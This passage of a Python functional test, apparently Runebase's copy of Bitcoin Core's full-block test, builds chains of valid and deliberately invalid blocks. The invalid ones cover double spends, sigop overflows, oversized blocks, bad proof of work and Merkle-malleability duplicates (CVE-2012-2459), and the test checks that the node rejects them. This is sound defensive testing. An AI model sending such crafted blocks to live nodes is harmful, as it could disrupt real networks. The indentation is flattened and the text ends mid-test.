import struct
import time
from test_framework.blocktools import (
create_block,
create_coinbase,
create_tx_with_script,
get_legacy_sigopcount_block,
MAX_BLOCK_SIGOPS,
)
from test_framework.key import ECKey
from test_framework.messages import (
CBlock,
COIN,
COutPoint,
CTransaction,
CTxIn,
CTxOut,
MAX_BLOCK_BASE_SIZE,
uint256_from_compact,
uint256_from_str,
)
from test_framework.mininode import P2PDataStore
from test_framework.script import (
CScript,
MAX_SCRIPT_ELEMENT_SIZE,
OP_2DUP,
OP_CHECKMULTISIG,
OP_CHECKMULTISIGVERIFY,
OP_CHECKSIG,
OP_CHECKSIGVERIFY,
OP_ELSE,
OP_ENDIF,
OP_EQUAL,
OP_DROP,
OP_FALSE,
OP_HASH160,
OP_IF,
OP_INVALIDOPCODE,
OP_RETURN,
OP_TRUE,
SIGHASH_ALL,
SignatureHash,
hash160,
)
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal
from data import invalid_txs
from test_framework.runebaseconfig import *
# Use this class for tests that require behavior other than normal "mininode" behavior.
# For now, it is used to serialize a bloated varint (b64).
class CBrokenBlock(CBlock):
def initialize(self, base_block):
self.vtx = copy.deepcopy(base_block.vtx)
self.hashMerkleRoot = self.calc_merkle_root()
def serialize(self, with_witness=False):
r = b""
r += super(CBlock, self).serialize()
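        # Write the tx count as a 0xff-prefixed 9-byte CompactSize, i.e. a deliberately non-canonical ("bloated") varint.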
r += struct.pack("<BQ", 255, len(self.vtx))
for tx in self.vtx:
if with_witness:
r += tx.serialize_with_witness()
else:
r += tx.serialize_without_witness()
return r
def normal_serialize(self):
return super().serialize()
class FullBlockTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
self.extra_args = [[]]
def run_test(self):
node = self.nodes[0] # convenience reference to the node
self.bootstrap_p2p() # Add one p2p connection to the node
self.block_heights = {}
self.coinbase_key = ECKey()
self.coinbase_key.generate()
self.coinbase_pubkey = self.coinbase_key.get_pubkey().get_bytes()
self.tip = None
self.blocks = {}
self.genesis_hash = int(self.nodes[0].getbestblockhash(), 16)
self.block_heights[self.genesis_hash] = 0
self.spendable_outputs = []
# Create a new block
b0 = self.next_block(0)
self.save_spendable_output()
self.sync_blocks([b0])
# These constants chosen specifically to trigger an immature coinbase spend
# at a certain time below.
NUM_BUFFER_BLOCKS_TO_GENERATE = 98-15+COINBASE_MATURITY
NUM_OUTPUTS_TO_COLLECT = 99
# Allow the block to mature
blocks = []
# Now we need that block to mature so we can spend the coinbase.
for i in range(NUM_BUFFER_BLOCKS_TO_GENERATE):
blocks.append(self.next_block("maturitybuffer.{}".format(i)))
self.save_spendable_output()
self.sync_blocks(blocks)
# collect spendable outputs now to avoid cluttering the code later on
out = []
for i in range(NUM_OUTPUTS_TO_COLLECT):
out.append(self.get_spendable_output())
# Start by building a couple of blocks on top (which output is spent is
# in parentheses):
# genesis -> b1 (0) -> b2 (1)
b1 = self.next_block(1, spend=out[0])
self.save_spendable_output()
b2 = self.next_block(2, spend=out[1])
self.save_spendable_output()
self.sync_blocks([b1, b2], timeout=4)
# Select a txn with an output eligible for spending. This won't actually be spent,
# since we're testing submission of a series of blocks with invalid txns.
attempt_spend_tx = out[2]
# Submit blocks for rejection, each of which contains a single transaction
# (aside from coinbase) which should be considered invalid.
for TxTemplate in invalid_txs.iter_all_templates():
template = TxTemplate(spend_tx=attempt_spend_tx)
if template.valid_in_block:
continue
self.log.info("Reject block with invalid tx: %s", TxTemplate.__name__)
blockname = "for_invalid.%s" % TxTemplate.__name__
badblock = self.next_block(blockname)
badtx = template.get_tx()
if TxTemplate != invalid_txs.InputMissing:
self.sign_tx(badtx, attempt_spend_tx)
badtx.rehash()
badblock = self.update_block(blockname, [badtx])
self.sync_blocks(
[badblock], success=False,
reject_reason=(template.block_reject_reason or template.reject_reason),
reconnect=True, timeout=2)
self.move_tip(2)
# Fork like this:
#
# genesis -> b1 (0) -> b2 (1)
# \-> b3 (1)
#
# Nothing should happen at this point. We saw b2 first so it takes priority.
self.log.info("Don't reorg to a chain of the same length")
self.move_tip(1)
b3 = self.next_block(3, spend=out[1])
txout_b3 = b3.vtx[1]
self.sync_blocks([b3], False)
# Now we add another block to make the alternative chain longer.
#
# genesis -> b1 (0) -> b2 (1)
# \-> b3 (1) -> b4 (2)
self.log.info("Reorg to a longer chain")
b4 = self.next_block(4, spend=out[2])
self.sync_blocks([b4])
# ... and back to the first chain.
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b3 (1) -> b4 (2)
self.move_tip(2)
b5 = self.next_block(5, spend=out[2])
self.save_spendable_output()
self.sync_blocks([b5], False)
self.log.info("Reorg back to the original chain")
b6 = self.next_block(6, spend=out[3])
self.sync_blocks([b6], True)
# Try to create a fork that double-spends
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b7 (2) -> b8 (4)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a chain with a double spend, even if it is longer")
self.move_tip(5)
b7 = self.next_block(7, spend=out[2])
self.sync_blocks([b7], False)
b8 = self.next_block(8, spend=out[4])
self.sync_blocks([b8], False, reconnect=True)
# Try to create a block that has too much fee
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b9 (4)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a block where the miner creates too much coinbase reward")
self.move_tip(6)
b9 = self.next_block(9, spend=out[4], additional_coinbase_value=1)
self.sync_blocks([b9], success=False, reconnect=True)
# Create a fork that ends in a block with too much fee (the one that causes the reorg)
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b10 (3) -> b11 (4)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a chain where the miner creates too much coinbase reward, even if the chain is longer")
self.move_tip(5)
b10 = self.next_block(10, spend=out[3])
self.sync_blocks([b10], False)
b11 = self.next_block(11, spend=out[4], additional_coinbase_value=1)
self.sync_blocks([b11], success=False, reconnect=True)
# Try again, but with a valid fork first
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b14 (5)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a chain where the miner creates too much coinbase reward, even if the chain is longer (on a forked chain)")
self.move_tip(5)
b12 = self.next_block(12, spend=out[3])
self.save_spendable_output()
b13 = self.next_block(13, spend=out[4])
self.save_spendable_output()
b14 = self.next_block(14, spend=out[5], additional_coinbase_value=1)
self.sync_blocks([b12, b13, b14], success=False, reconnect=True)
# New tip should be b13.
assert_equal(node.getbestblockhash(), b13.hash)
# Add a block with MAX_BLOCK_SIGOPS and one with one more sigop
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b15 (5) -> b16 (6)
# \-> b3 (1) -> b4 (2)
self.log.info("Accept a block with lots of checksigs")
lots_of_checksigs = CScript([OP_CHECKSIG] * (MAX_BLOCK_SIGOPS - 1))
self.move_tip(13)
b15 = self.next_block(15, spend=out[5], script=lots_of_checksigs)
self.save_spendable_output()
self.sync_blocks([b15], True)
self.log.info("Reject a block with too many checksigs")
too_many_checksigs = CScript([OP_CHECKSIG] * (MAX_BLOCK_SIGOPS))
b16 = self.next_block(16, spend=out[6], script=too_many_checksigs)
self.sync_blocks([b16], success=False, reject_reason='bad-blk-sigops', reconnect=True)
# Attempt to spend a transaction created on a different fork
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b15 (5) -> b17 (b3.vtx[1])
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a block with a spend from a re-org'ed out tx")
self.move_tip(15)
b17 = self.next_block(17, spend=txout_b3)
self.sync_blocks([b17], success=False, reject_reason='bad-txns-inputs-missingorspent', reconnect=True)
# Attempt to spend a transaction created on a different fork (on a fork this time)
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b15 (5)
# \-> b18 (b3.vtx[1]) -> b19 (6)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a block with a spend from a re-org'ed out tx (on a forked chain)")
self.move_tip(13)
b18 = self.next_block(18, spend=txout_b3)
self.sync_blocks([b18], False)
b19 = self.next_block(19, spend=out[6])
self.sync_blocks([b19], success=False, reject_reason='bad-txns-inputs-missingorspent', reconnect=True)
# Attempt to spend a coinbase at depth too low
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b15 (5) -> b20 (7)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a block spending an immature coinbase.")
self.move_tip(15)
b20 = self.next_block(20, spend=out[98])
self.sync_blocks([b20], success=False, reject_reason='bad-txns-premature-spend-of-coinbase')
# Attempt to spend a coinbase at depth too low (on a fork this time)
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b15 (5)
# \-> b21 (6) -> b22 (5)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a block spending an immature coinbase (on a forked chain)")
self.move_tip(13)
b21 = self.next_block(21, spend=out[6])
self.sync_blocks([b21], False)
b22 = self.next_block(22, spend=out[96])
self.sync_blocks([b22], success=False, reject_reason='bad-txns-premature-spend-of-coinbase')
# Create a block on either side of MAX_BLOCK_BASE_SIZE and make sure its accepted/rejected
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b15 (5) -> b23 (6)
# \-> b24 (6) -> b25 (7)
# \-> b3 (1) -> b4 (2)
self.log.info("Accept a block of size MAX_BLOCK_BASE_SIZE")
self.move_tip(15)
b23 = self.next_block(23, spend=out[6])
tx = CTransaction()
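        # Pad the block with one large data-push transaction; the constant 69 covers that transaction's own
        # serialization overhead, so the finished block is exactly the maximum size (see the assert below).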
script_length = 1000000 - len(b23.serialize()) - 69
script_output = CScript([b'\x00' * script_length])
tx.vout.append(CTxOut(0, script_output))
tx.vin.append(CTxIn(COutPoint(b23.vtx[1].sha256, 0)))
b23 = self.update_block(23, [tx])
# Make sure the math above worked out to produce a max-sized block
assert_equal(len(b23.serialize()), 1000000)
self.sync_blocks([b23], True)
self.save_spendable_output()
self.log.info("Reject a block of size MAX_BLOCK_BASE_SIZE + 1")
self.move_tip(15)
b24 = self.next_block(24, spend=out[6])
script_length = MAX_BLOCK_BASE_SIZE - len(b24.serialize()) - 69
script_output = CScript([b'\x00' * (script_length + 1)])
tx.vout = [CTxOut(0, script_output)]
b24 = self.update_block(24, [tx])
assert_equal(len(b24.serialize()), MAX_BLOCK_BASE_SIZE + 1)
self.sync_blocks([b24], success=False, reconnect=True)
b25 = self.next_block(25, spend=out[7])
self.sync_blocks([b25], False)
# Create blocks with a coinbase input script size out of range
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b15 (5) -> b23 (6) -> b30 (7)
# \-> ... (6) -> ... (7)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a block with coinbase input script size out of range")
self.move_tip(15)
b26 = self.next_block(26, spend=out[6])
b26.vtx[0].vin[0].scriptSig = b'\x00'
b26.vtx[0].rehash()
# update_block causes the merkle root to get updated, even with no new
# transactions, and updates the required state.
b26 = self.update_block(26, [])
self.sync_blocks([b26], success=False, reject_reason='bad-cb-length', reconnect=True)
# Extend the b26 chain to make sure bitcoind isn't accepting b26
b27 = self.next_block(27, spend=out[7])
self.sync_blocks([b27], False)
# Now try a too-large-coinbase script
self.move_tip(15)
b28 = self.next_block(28, spend=out[6])
b28.vtx[0].vin[0].scriptSig = b'\x00' * 101
b28.vtx[0].rehash()
b28 = self.update_block(28, [])
self.sync_blocks([b28], success=False, reject_reason='bad-cb-length', reconnect=True)
# Extend the b28 chain to make sure bitcoind isn't accepting b28
b29 = self.next_block(29, spend=out[7])
self.sync_blocks([b29], False)
# b30 has a max-sized coinbase scriptSig.
self.move_tip(23)
b30 = self.next_block(30)
b30.vtx[0].vin[0].scriptSig += b'\x00' * 90
b30.vtx[0].rehash()
b30 = self.update_block(30, [])
self.sync_blocks([b30], True)
self.save_spendable_output()
# b31 - b35 - check sigops of OP_CHECKMULTISIG / OP_CHECKMULTISIGVERIFY / OP_CHECKSIGVERIFY
#
# genesis -> ... -> b30 (7) -> b31 (8) -> b33 (9) -> b35 (10)
# \-> b36 (11)
# \-> b34 (10)
# \-> b32 (9)
#
# MULTISIG: each op code counts as 20 sigops. To create the edge case, pack another 19 sigops at the end.
self.log.info("Accept a block with the max number of OP_CHECKMULTISIG sigops")
lots_of_multisigs = CScript([OP_CHECKMULTISIG] * ((MAX_BLOCK_SIGOPS - 1) // 20) + [OP_CHECKSIG] * 19)
b31 = self.next_block(31, spend=out[8], script=lots_of_multisigs)
assert_equal(get_legacy_sigopcount_block(b31), MAX_BLOCK_SIGOPS)
self.sync_blocks([b31], True)
self.save_spendable_output()
# this goes over the limit because the coinbase has one sigop
self.log.info("Reject a block with too many OP_CHECKMULTISIG sigops")
too_many_multisigs = CScript([OP_CHECKMULTISIG] * (MAX_BLOCK_SIGOPS // 20))
b32 = self.next_block(32, spend=out[9], script=too_many_multisigs)
assert_equal(get_legacy_sigopcount_block(b32), MAX_BLOCK_SIGOPS + 1)
self.sync_blocks([b32], success=False, reject_reason='bad-blk-sigops', reconnect=True)
# CHECKMULTISIGVERIFY
self.log.info("Accept a block with the max number of OP_CHECKMULTISIGVERIFY sigops")
self.move_tip(31)
lots_of_multisigs = CScript([OP_CHECKMULTISIGVERIFY] * ((MAX_BLOCK_SIGOPS - 1) // 20) + [OP_CHECKSIG] * 19)
b33 = self.next_block(33, spend=out[9], script=lots_of_multisigs)
self.sync_blocks([b33], True)
self.save_spendable_output()
self.log.info("Reject a block with too many OP_CHECKMULTISIGVERIFY sigops")
too_many_multisigs = CScript([OP_CHECKMULTISIGVERIFY] * (MAX_BLOCK_SIGOPS // 20))
b34 = self.next_block(34, spend=out[10], script=too_many_multisigs)
self.sync_blocks([b34], success=False, reject_reason='bad-blk-sigops', reconnect=True)
# CHECKSIGVERIFY
self.log.info("Accept a block with the max number of OP_CHECKSIGVERIFY sigops")
self.move_tip(33)
lots_of_checksigs = CScript([OP_CHECKSIGVERIFY] * (MAX_BLOCK_SIGOPS - 1))
b35 = self.next_block(35, spend=out[10], script=lots_of_checksigs)
self.sync_blocks([b35], True)
self.save_spendable_output()
self.log.info("Reject a block with too many OP_CHECKSIGVERIFY sigops")
too_many_checksigs = CScript([OP_CHECKSIGVERIFY] * (MAX_BLOCK_SIGOPS))
b36 = self.next_block(36, spend=out[11], script=too_many_checksigs)
self.sync_blocks([b36], success=False, reject_reason='bad-blk-sigops', reconnect=True)
# Check spending of a transaction in a block which failed to connect
#
# b6 (3)
# b12 (3) -> b13 (4) -> b15 (5) -> b23 (6) -> b30 (7) -> b31 (8) -> b33 (9) -> b35 (10)
# \-> b37 (11)
# \-> b38 (11/37)
#
# save 37's spendable output, but then double-spend out11 to invalidate the block
self.log.info("Reject a block spending transaction from a block which failed to connect")
self.move_tip(35)
b37 = self.next_block(37, spend=out[11])
txout_b37 = b37.vtx[1]
tx = self.create_and_sign_transaction(out[11], 0)
b37 = self.update_block(37, [tx])
self.sync_blocks([b37], success=False, reject_reason='bad-txns-inputs-missingorspent', reconnect=True)
# attempt to spend b37's first non-coinbase tx, at which point b37 was still considered valid
self.move_tip(35)
b38 = self.next_block(38, spend=txout_b37)
self.sync_blocks([b38], success=False, reject_reason='bad-txns-inputs-missingorspent', reconnect=True)
# Check P2SH SigOp counting
#
#
# 13 (4) -> b15 (5) -> b23 (6) -> b30 (7) -> b31 (8) -> b33 (9) -> b35 (10) -> b39 (11) -> b41 (12)
# \-> b40 (12)
#
# b39 - create some P2SH outputs that will require 6 sigops to spend:
#
# redeem_script = COINBASE_PUBKEY, (OP_2DUP+OP_CHECKSIGVERIFY) * 5, OP_CHECKSIG
# p2sh_script = OP_HASH160, ripemd160(sha256(script)), OP_EQUAL
#
self.log.info("Check P2SH SIGOPS are correctly counted")
self.move_tip(35)
b39 = self.next_block(39)
b39_outputs = 0
b39_sigops_per_output = 6
# Build the redeem script, hash it, use hash to create the p2sh script
redeem_script = CScript([self.coinbase_pubkey] + [OP_2DUP, OP_CHECKSIGVERIFY] * 5 + [OP_CHECKSIG])
redeem_script_hash = hash160(redeem_script)
p2sh_script = CScript([OP_HASH160, redeem_script_hash, OP_EQUAL])
# Create a transaction that spends one satoshi to the p2sh_script, the rest to OP_TRUE
# This must be signed because it is spending a coinbase
spend = out[11]
tx = self.create_tx(spend, 0, 1, p2sh_script)
tx.vout.append(CTxOut(spend.vout[0].nValue - 1, CScript([OP_TRUE])))
self.sign_tx(tx, spend)
tx.rehash()
b39 = self.update_block(39, [tx])
b39_outputs += 1
# Until block is full, add tx's with 1 satoshi to p2sh_script, the rest to OP_TRUE
tx_new = None
tx_last = tx
total_size = len(b39.serialize())
while(total_size < MAX_BLOCK_BASE_SIZE):
tx_new = self.create_tx(tx_last, 1, 1, p2sh_script)
tx_new.vout.append(CTxOut(tx_last.vout[1].nValue - 1, CScript([OP_TRUE])))
tx_new.rehash()
total_size += len(tx_new.serialize())
if total_size >= MAX_BLOCK_BASE_SIZE:
break
b39.vtx.append(tx_new) # add tx to block
tx_last = tx_new
b39_outputs += 1
b39 = self.update_block(39, [])
self.sync_blocks([b39], True)
self.save_spendable_output()
# Test sigops in P2SH redeem scripts
#
# b40 creates 3333 tx's spending the 6-sigop P2SH outputs from b39 for a total of 19998 sigops.
# The first tx has one sigop and then at the end we add 2 more to put us just over the max.
#
# b41 does the same, less one, so it has the maximum sigops permitted.
#
self.log.info("Reject a block with too many P2SH sigops")
self.move_tip(39)
b40 = self.next_block(40, spend=out[12])
sigops = get_legacy_sigopcount_block(b40)
numTxes = (MAX_BLOCK_SIGOPS - sigops) // b39_sigops_per_output
assert_equal(numTxes <= b39_outputs, True)
lastOutpoint = COutPoint(b40.vtx[1].sha256, 0)
new_txs = []
for i in range(1, numTxes + 1):
tx = CTransaction()
tx.vout.append(CTxOut(1, CScript([OP_TRUE])))
tx.vin.append(CTxIn(lastOutpoint, b''))
# second input is corresponding P2SH output from b39
tx.vin.append(CTxIn(COutPoint(b39.vtx[i].sha256, 0), b''))
# Note: must pass the redeem_script (not p2sh_script) to the signature hash function
(sighash, err) = SignatureHash(redeem_script, tx, 1, SIGHASH_ALL)
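            # The P2SH input's scriptSig supplies the DER signature plus the one-byte sighash type, followed by the redeem script.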
sig = self.coinbase_key.sign_ecdsa(sighash) + bytes(bytearray([SIGHASH_ALL]))
scriptSig = CScript([sig, redeem_script])
tx.vin[1].scriptSig = scriptSig
tx.rehash()
new_txs.append(tx)
lastOutpoint = COutPoint(tx.sha256, 0)
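        # The trailing "+ 1" pushes the block exactly one sigop over MAX_BLOCK_SIGOPS.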
b40_sigops_to_fill = MAX_BLOCK_SIGOPS - (numTxes * b39_sigops_per_output + sigops) + 1
tx = CTransaction()
tx.vin.append(CTxIn(lastOutpoint, b''))
tx.vout.append(CTxOut(1, CScript([OP_CHECKSIG] * b40_sigops_to_fill)))
tx.rehash()
new_txs.append(tx)
self.update_block(40, new_txs)
self.sync_blocks([b40], success=False, reject_reason='bad-blk-sigops', reconnect=True)
# same as b40, but one less sigop
self.log.info("Accept a block with the max number of P2SH sigops")
self.move_tip(39)
b41 = self.next_block(41, spend=None)
self.update_block(41, b40.vtx[1:-1])
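        # One sigop fewer than b40, landing exactly on the MAX_BLOCK_SIGOPS limit.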
b41_sigops_to_fill = b40_sigops_to_fill - 1
tx = CTransaction()
tx.vin.append(CTxIn(lastOutpoint, b''))
tx.vout.append(CTxOut(1, CScript([OP_CHECKSIG] * b41_sigops_to_fill)))
tx.rehash()
self.update_block(41, [tx])
self.sync_blocks([b41], True)
# Fork off of b39 to create a constant base again
#
# b23 (6) -> b30 (7) -> b31 (8) -> b33 (9) -> b35 (10) -> b39 (11) -> b42 (12) -> b43 (13)
# \-> b41 (12)
#
self.move_tip(39)
b42 = self.next_block(42, spend=out[12])
self.save_spendable_output()
b43 = self.next_block(43, spend=out[13])
self.save_spendable_output()
self.sync_blocks([b42, b43], True)
# Test a number of really invalid scenarios
#
# -> b31 (8) -> b33 (9) -> b35 (10) -> b39 (11) -> b42 (12) -> b43 (13) -> b44 (14)
# \-> ??? (15)
# The next few blocks are going to be created "by hand" since they'll do funky things, such as having
# the first transaction be non-coinbase, etc. The purpose of b44 is to make sure this works.
self.log.info("Build block 44 manually")
height = self.block_heights[self.tip.sha256] + 1
coinbase = create_coinbase(height, self.coinbase_pubkey)
b44 = CBlock()
b44.nTime = self.tip.nTime + 1
b44.hashPrevBlock = self.tip.sha256
b44.nBits = 0x207fffff
b44.vtx.append(coinbase)
b44.hashMerkleRoot = b44.calc_merkle_root()
b44.solve()
self.tip = b44
self.block_heights[b44.sha256] = height
self.blocks[44] = b44
self.sync_blocks([b44], True)
self.log.info("Reject a block with a non-coinbase as the first tx")
non_coinbase = self.create_tx(out[15], 0, 1)
b45 = CBlock()
b45.nTime = self.tip.nTime + 1
b45.hashPrevBlock = self.tip.sha256
b45.nBits = 0x207fffff
b45.vtx.append(non_coinbase)
b45.hashMerkleRoot = b45.calc_merkle_root()
b45.calc_sha256()
b45.solve()
self.block_heights[b45.sha256] = self.block_heights[self.tip.sha256] + 1
self.tip = b45
self.blocks[45] = b45
self.sync_blocks([b45], success=False, reject_reason='bad-cb-missing', reconnect=True)
self.log.info("Reject a block with no transactions")
self.move_tip(44)
b46 = CBlock()
b46.nTime = b44.nTime + 1
b46.hashPrevBlock = b44.sha256
b46.nBits = 0x207fffff
b46.vtx = []
b46.hashMerkleRoot = 0
b46.solve()
self.block_heights[b46.sha256] = self.block_heights[b44.sha256] + 1
self.tip = b46
assert 46 not in self.blocks
self.blocks[46] = b46
self.sync_blocks([b46], success=False, reject_reason='bad-cb-missing', reconnect=True)
self.log.info("Reject a block with invalid work")
self.move_tip(44)
b47 = self.next_block(47, solve=False)
target = uint256_from_compact(b47.nBits)
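        # Grind the nonce until the hash is no longer below the target, i.e. the proof of work becomes invalid.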
while b47.sha256 < target:
b47.nNonce += 1
b47.rehash()
self.sync_blocks([b47], False, force_send=True, reject_reason='high-hash')
self.log.info("Reject a block with a timestamp >2 hours in the future")
self.move_tip(44)
b48 = self.next_block(48, solve=False)
b48.nBits -= 1
b48.solve()
self.sync_blocks([b48], False, force_send=True, reconnect=True)
self.log.info("Reject a block with invalid merkle hash")
self.move_tip(44)
b49 = self.next_block(49)
b49.hashMerkleRoot += 1
b49.solve()
self.sync_blocks([b49], success=False, reject_reason='bad-txnmrklroot', reconnect=True)
self.log.info("Reject a block with incorrect POW limit")
self.move_tip(44)
b50 = self.next_block(50)
b50.nBits = b50.nBits - 1
b50.solve()
self.sync_blocks([b50], False, force_send=True, reject_reason='bad-diffbits', reconnect=True)
self.log.info("Reject a block with two coinbase transactions")
self.move_tip(44)
b51 = self.next_block(51)
cb2 = create_coinbase(51, self.coinbase_pubkey)
b51 = self.update_block(51, [cb2])
self.sync_blocks([b51], success=False, reject_reason='bad-cb-multiple', reconnect=True)
self.log.info("Reject a block with duplicate transactions")
# Note: txns have to be in the right position in the merkle tree to trigger this error
self.move_tip(44)
b52 = self.next_block(52, spend=out[15])
tx = self.create_tx(b52.vtx[1], 0, 1)
b52 = self.update_block(52, [tx, tx])
self.sync_blocks([b52], success=False, reject_reason='bad-txns-duplicate', reconnect=True)
# Test block timestamps
# -> b31 (8) -> b33 (9) -> b35 (10) -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15)
# \-> b54 (15)
#
self.move_tip(43)
b53 = self.next_block(53, spend=out[14])
self.sync_blocks([b53], False, force_send=False)
self.save_spendable_output()
self.log.info("Reject a block with timestamp before MedianTimePast")
b54 = self.next_block(54, spend=out[15])
b54.nBits -= 1
b54.solve()
self.sync_blocks([b54], False, force_send=True, reconnect=True)
# valid timestamp
self.move_tip(53)
b55 = self.next_block(55, spend=out[15])
b55.nTime = b35.nTime
self.update_block(55, [])
self.sync_blocks([b55], True, force_send=True)
self.save_spendable_output()
# Test Merkle tree malleability
#
# -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57p2 (16)
# \-> b57 (16)
# \-> b56p2 (16)
# \-> b56 (16)
#
# Merkle tree malleability (CVE-2012-2459): repeating sequences of transactions in a block without
# affecting the merkle root of a block, while still invalidating it.
# See: src/consensus/merkle.h
#
# b57 has three txns: coinbase, tx, tx1. The merkle root computation will duplicate tx.
# Result: OK
#
# b56 copies b57 but duplicates tx1 and does not recalculate the block hash. So it has a valid merkle
# root but duplicate transactions.
# Result: Fails
#
# b57p2 has six transactions in its merkle tree:
# - coinbase, tx, tx1, tx2, tx3, tx4
# Merkle root calculation will duplicate as necessary.
# Result: OK.
#
# b56p2 copies b57p2 but adds both tx3 and tx4. The purpose of the test is to make sure the code catches
# duplicate txns that are not next to one another with the "bad-txns-duplicate" error (which indicates
# that the error was caught early, avoiding a DOS vulnerability.)
# b57 - a good block with 2 txs, don't submit until end
self.move_tip(55)
b57 = self.next_block(57)
tx = self.create_and_sign_transaction(out[16], 1)
tx1 = self.create_tx(tx, 0, 1)
b57 = self.update_block(57, [tx, tx1])
# b56 - copy b57, add a duplicate tx
self.log.info("Reject a block with a duplicate transaction in the Merkle Tree (but with a valid Merkle Root)")
self.move_tip(55)
b56 = copy.deepcopy(b57)
self.blocks[56] = b56
assert_equal(len(b56.vtx), 3)
b56 = self.update_block(56, [tx1])
assert_equal(b56.hash, b57.hash)
self.sync_blocks([b56], success=False, reject_reason='bad-txns-duplicate', reconnect=True)
# b57p2 - a good block with 6 tx'es, don't submit until end
self.move_tip(55)
b57p2 = self.next_block("57p2")
tx = self.create_and_sign_transaction(out[16], 1)
tx1 = self.create_tx(tx, 0, 1)
tx2 = self.create_tx(tx1, 0, 1)
tx3 = self.create_tx(tx2, 0, 1)
tx4 = self.create_tx(tx3, 0, 1)
b57p2 = self.update_block("57p2", [tx, tx1, tx2, tx3, tx4])
# b56p2 - copy b57p2, duplicate two non-consecutive tx's
self.log.info("Reject a block with two duplicate transactions in the Merkle Tree (but with a valid Merkle Root)")
self.move_tip(55)
b56p2 = copy.deepcopy(b57p2)
self.blocks["b56p2"] = b56p2
assert_equal(b56p2.hash, b57p2.hash)
assert_equal(len(b56p2.vtx), 6)
b56p2 = self.update_block("b56p2", [tx3, tx4])
self.sync_blocks([b56p2], success=False, reject_reason='bad-txns-duplicate', reconnect=True)
self.move_tip("57p2")
self.sync_blocks([b57p2], True)
self.move_tip(57)
self.sync_blocks([b57], False) # The tip is not updated because 57p2 seen first
self.save_spendable_output()
# Test a few invalid tx types
#
# -> b35 (10) -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17)
# \-> ??? (17)
#
# tx with prevout.n out of range
self.log.info("Reject a block with a transaction with prevout.n out of range")
self.move_tip(57)
b58 = self.next_block(58, spend=out[17])
tx = CTransaction()
assert(len(out[17].vout) < 42)
tx.vin.append(CTxIn(COutPoint(out[17].sha256, 42), CScript([OP_TRUE]), 0xffffffff))
tx.vout.append(CTxOut(0, CScript([OP_TRUE])))
tx.calc_sha256()
b58 = self.update_block(58, [tx])
self.sync_blocks([b58], success=False, reject_reason='bad-txns-inputs-missingorspent', reconnect=True)
# tx with output value > input value
self.log.info("Reject a block with a transaction with outputs > inputs")
self.move_tip("57p2")
b59 = self.next_block(59)
tx = self.create_and_sign_transaction(out[17], int(INITIAL_BLOCK_REWARD+1) * COIN)
b59 = self.update_block(59, [tx])
self.sync_blocks([b59], success=False, reject_reason='bad-txns-in-belowout', reconnect=True)
# reset to good chain
self.move_tip(57)
b60 = self.next_block(60, spend=out[17])
self.sync_blocks([b60], True)
self.save_spendable_output()
# Test BIP30
#
# -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17)
# \-> b61 (18)
#
# Blocks are not allowed to contain a transaction whose id matches that of an earlier,
# not-fully-spent transaction in the same chain. To test, make identical coinbases;
# the second one should be rejected.
#
# RUNEBASE: Since we enable BIP34 from block 0, this BIP30 test is no longer relevant. This test has therefore been removed.
#self.log.info("Reject a block with a transaction with a duplicate hash of a previous transaction (BIP30)")
#self.move_tip(60)
#b61 = self.next_block(61, spend=out[18])
#b61.vtx[0].vin[0].scriptSig = b60.vtx[0].vin[0].scriptSig # Equalize the coinbases
#b61.vtx[0].rehash()
#b61 = self.update_block(61, [])
#assert_equal(b60.vtx[0].serialize(), b61.vtx[0].serialize())
#self.sync_blocks([b61], success=False, reject_reason='bad-txns-BIP30', reconnect=True)
# Test tx.isFinal is properly rejected (not an exhaustive tx.isFinal test, that should be in data-driven transaction tests)
#
# -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17)
# \-> b62 (18)
#
self.log.info("Reject a block with a transaction with a nonfinal locktime")
self.move_tip(60)
b62 = self.next_block(62)
tx = CTransaction()
tx.nLockTime = 0xffffffff # this locktime is non-final
tx.vin.append(CTxIn(COutPoint(out[18].sha256, 0))) # don't set nSequence
tx.vout.append(CTxOut(0, CScript([OP_TRUE])))
assert(tx.vin[0].nSequence < 0xffffffff)
tx.calc_sha256()
b62 = self.update_block(62, [tx])
self.sync_blocks([b62], success=False, reject_reason='bad-txns-nonfinal')
# Test a non-final coinbase is also rejected
#
# -> b39 (11) -> b42 (12) -> b43 (13) -> b53 (14) -> b55 (15) -> b57 (16) -> b60 (17)
# \-> b63 (-)
#
self.log.info("Reject a block with a coinbase transaction with a nonfinal locktime")
